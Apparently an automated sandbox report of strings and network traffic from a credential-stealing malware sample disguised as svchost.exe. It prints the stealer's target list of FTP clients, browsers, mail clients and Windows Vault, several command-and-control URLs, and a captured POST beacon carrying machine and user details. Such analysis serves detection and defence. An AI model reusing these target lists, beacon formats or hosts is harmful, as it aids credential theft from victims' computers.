          Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x353eafea,0x01d659c0</date><accdate>0x353eafea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
          Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3542a2ec,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
          Source: msapplication.xml8.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3542a2ec,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
          Source: svchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormDatahttp://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormDatahttp://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_**ftp://SspiPfcB equals www.facebook.com (Facebook)
          Source: svchost.exe, 00000006.00000003.460854186.0000000005C00000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmpString found in binary or memory: Content-Length:Location:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)moz_loginssignons3.txtsignons2.txtsignons.txtsignons.sqlitelogins.jsonprefs.jsPathToExeIsRelativeProfileprofiles.iniidentitiesoutlook account manager passwordsinetcomm server passwordsidentitymgridentificationSMTP PasswordHTTP PasswordNNTP PasswordIMAP PasswordPOP3 PasswordSMTP Password2HTTPMail Password2NNTP Password2IMAP Password2POP3 Password2IMAP PortSMTP PortPOP3 Port<HTTPMail_Password2<IMAP_Password2<SMTP_Password2<POP3_Password2</>Salt.oeaccountMicrosoft_WinInet_*abe2869f-9b47-4cd9-a358-c22904dba7f7?DPAPI: MS IE FTP PasswordsWininetCacheCredentialsInternet ExplorerSoftware\Martin PrikrylFSProtocolPortNumberRemoteDirectoryUserNameHostNamePassword \*.**.*...\Software\FileZillaInstall_DirSoftware\FileZilla Client\sitemanager.xml\recentservers.xml\filezilla.xmlHostUserPassPortRemote DirServer TypeServer.HostServer.UserServer.PassServer.PortPathServerTypeLast Server HostLast Server UserLast Server PassLast Server PortLast Server PathLast Server Type\FileZillaHWID{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}kernel32.dllGetNativeSystemInfo\Google\ChromeWeb DataLogin Dataloginstableaction_urlpassword_valueusername_valueCONSTRAINTPRIMARYUNIQUECHECKFOREIGNnoftp://http://https://\Chromium(SQLite format 3PWPthRSSHSoftware\FTPWare\COREFTP\Sites.ini\VanDyke\Config\SessionsConfig PathSoftware\VanDyke\SecureFX\SessionsQCHistory\sm.dat\GlobalSCAPE\CuteFTP\GlobalSCAPE\CuteFTP Pro\GlobalSCAPE\CuteFTP Lite\CuteFTPSoftware\GlobalSCAPE\CuteFTP 6 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarSoftware\GlobalSCAPE\CuteFTP 7 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarSoftware\GlobalSCAPE\CuteFTP 8 Home\QCToolbarSoftware\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarSoftware\GlobalSCAPE\CuteFTP 9\QCToolbarSites.datQuick.datHistory.dat\FlashFXP\3\FlashFXP\4\FlashFXP\5\Sites.dat\Quick.dat\History.datSoftware\FlashFXP\3Software\FlashFXPSoftware\FlashFXP\4Software\FlashFXP\5InstallerDathPathpathInstall PathDataFolderInstallDataFolderSoftware\Ghisler\Windows CommanderSoftware\Ghisler\Total CommanderInstallDirFtpIniNamewcx_ftp.ini\GHISLER6ulekscV\JbDggHg\Xv3Db 6HRRLQ5g\6v2R9DpH\TL3pvgv2R\kLQEv9g\JAppHQRaHpgLvQ\s44JvQRDLQHp\6RvpD5H\OL3pvgv2R.OL3pvgv2RHE5HCi9HrwfdEiff9H\TL3pvgv2RVE5H\1QRHbbLlvpOg\lvpOoDRDSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2%s%2.2Xhttp://www.facebook.com/vaultcli.dllVaultEnumerateItemsVaultEnumerateVaultsVaultFreeVaultGetItemVaultOpenVaultVaultCloseVaultPstorec.dllPStoreCreateInstance\Microsoft\Windows Live MailSoftware\Microsoft\Windows Live Mail\Microsoft\Windows MailSoftware\Microsoft\Windows MailSMTP Email AddressSMTP ServerPOP3 ServerPOP3 User NameSMTP User NameNNTP Email AddressNNTP User NameNNTP ServerIMAP ServerIMAP User NameEmailHTTP UserHTTP Server URLPOP3 UserIMAP UserHTTPMail User NameHTTPMail ServerSMTP User6v2R9DpH\TL3pvgv2R\u22L3H\uARbvvr\uT1 s33vAQR TDQD5Hp\s33vAQRg6v2R9DpH\TL3pvgv2R\kLQE
          Source: svchost.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: unknownDNS traffic detected: queries for: mac-rail.com
          Source: unknownHTTP traffic detected: POST /4/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: overnightfile.comContent-Length: 111Cache-Control: no-cacheData Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 14 Jul 2020 09:21:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
          Source: svchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmpString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datMozilla
          Source: regsvr32.exe, 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, svchost.exeString found in binary or memory: http://api.ipify.org
          Source: regsvr32.exe, 00000005.00000002.481925943.00000000046C0000.00000040.00000001.sdmp, svchost.exe, 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID=%I64u&BUILD=%
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: http://autopilotsales.in/wp-content/plugins/1
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: http://autopilotsales.in/wp-content/plugins/2
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: http://autopilotsales.in/wp-content/plugins/3
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/07
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: http://diennangluongmattroitinnhiem.com/wp-content/themes/futurio/1
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: http://diennangluongmattroitinnhiem.com/wp-content/themes/futurio/2
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: http://diennangluongmattroitinnhiem.com/wp-content/themes/futurio/3
          Source: {79DD1813-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat.22.dr, ~DF883191F39C641F79.TMP.22.drString found in binary or memory: http://gaw.explik.at/webstore/Wn2lrwDcfADSyX9Xa/bQ9IeTtb06T_/2Fyc5Du3a5C/Lbn9mkIxBLN4KS/0RiYslQln2uS
          Source: {5D34F2B6-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat.19.drString found in binary or memory: http://gaw.explik.at/webstore/kForBNOkuld/PMlfu1v0euSE_2/BxUhIJ7s_2Bzsa3aIvWWg/Plua7gYt6_2FPIim/H4Js
          Source: svchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmpString found in binary or memory: http://https://ftp://operawand.dat_Software
          Source: svchost.exe, 00000006.00000002.707985269.0000000002846000.00000004.00000001.sdmpString found in binary or memory: http://ibexjade.ru/4/forum.php
          Source: svchost.exeString found in binary or memory: http://ibexjade.ru/4/mlu/forum.php
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
          Source: svchost.exe, 00000006.00000003.694324404.00000000028B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: svchost.exe, 00000006.00000002.707985269.0000000002846000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmpString found in binary or memory: http://overnightfile.com/4/forum.php
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpString found in binary or memory: http://overnightfile.com/4/forum.php00715ysmLMEM8(
          Source: svchost.exe, 00000006.00000002.708220563.0000000002894000.00000004.00000001.sdmpString found in binary or memory: http://overnightfile.com/4/forum.phpd
          Source: svchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmpString found in binary or memory: http://overnightfile.com/4/forum.phpect
          Source: svchost.exeString found in binary or memory: http://overnightfile.com/mlu/forum.php
          Source: svchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmpString found in binary or memory: http://overnightfile.com/mlu/forum.phphttp://toolboxkasa.ru/mlu/forum.phphttp://ibexjade.ru/4/mlu/fo
          Source: svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmpString found in binary or memory: http://ss.ask.com/query?q=
          Source: svchost.exe, 00000006.00000002.707985269.0000000002846000.00000004.00000001.sdmpString found in binary or memory: http://toolboxkasa.ru/4/forum.php
          Source: svchost.exeString found in binary or memory: http://toolboxkasa.ru/mlu/forum.php
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: msapplication.xml.19.drString found in binary or memory: http://www.amazon.com/
          Source: msapplication.xml2.19.drString found in binary or memory: http://www.google.com/
          Source: svchost.exe, svchost.exe, 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: msapplication.xml3.19.drString found in binary or memory: http://www.live.com/
          Source: msapplication.xml4.19.drString found in binary or memory: http://www.nytimes.com/
          Source: msapplication.xml5.19.drString found in binary or memory: http://www.reddit.com/
          Source: msapplication.xml6.19.drString found in binary or memory: http://www.twitter.com/
          Source: msapplication.xml7.19.drString found in binary or memory: http://www.wikipedia.com/
          Source: msapplication.xml8.19.drString found in binary or memory: http://www.youtube.com/
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/obalSCAPE
          Source: svchost.exe, 00000006.00000002.707904057.0000000002829000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/1
          Source: svchost.exe, 00000006.00000002.707778201.0000000002800000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/1nt
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/2
          Source: svchost.exe, 00000006.00000002.708057638.0000000002859000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/2https://accesoeducativo.com/wp-content/themes
          Source: svchost.exe, 00000006.00000002.708971816.0000000004800000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/3
          Source: svchost.exe, 00000006.00000002.708057638.0000000002859000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/wp-content/themes/futurio/32.23.43.1.4.9wtls9ECDHCryptOIDInfoECCParamete
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/x/1.16.1
          Source: svchost.exe, 00000006.00000002.708148934.000000000287B000.00000004.00000001.sdmpString found in binary or memory: https://accesoeducativo.com/xplorer
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://api.aadrm.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://api.diagnostics.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://api.microsoftstream.com/api/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://api.onedrive.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://apis.live.net/v5.0/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://app.powerbi.com/taskpane.html
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://augloop.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: svchost.exe, 00000006.00000003.448453203.0000000005A12000.00000004.00000001.sdmpString found in binary or memory: https://autosuggest.search.aol.com/autocomplete/get?output=json&it=&q=
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://cdn.entity.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://clients.config.office.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://config.edge.skype.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://cr.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://dataservice.o365filtering.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://dataservice.o365filtering.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://devnull.onenote.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://directory.services.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://graph.ppe.windows.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://graph.ppe.windows.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://graph.windows.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://graph.windows.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://incidents.diagnostics.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://lifecycle.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://login.microsoftonline.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://login.microsoftonline.com/common
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://login.windows.local
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://management.azure.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://management.azure.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://messaging.office.com/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://ncus-000.contentsync.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://ncus-000.pagecontentsync.
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://officeapps.live.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://onedrive.live.com
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: D5DED82E-F14D-4C75-B211-3C8926E9C5FD.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
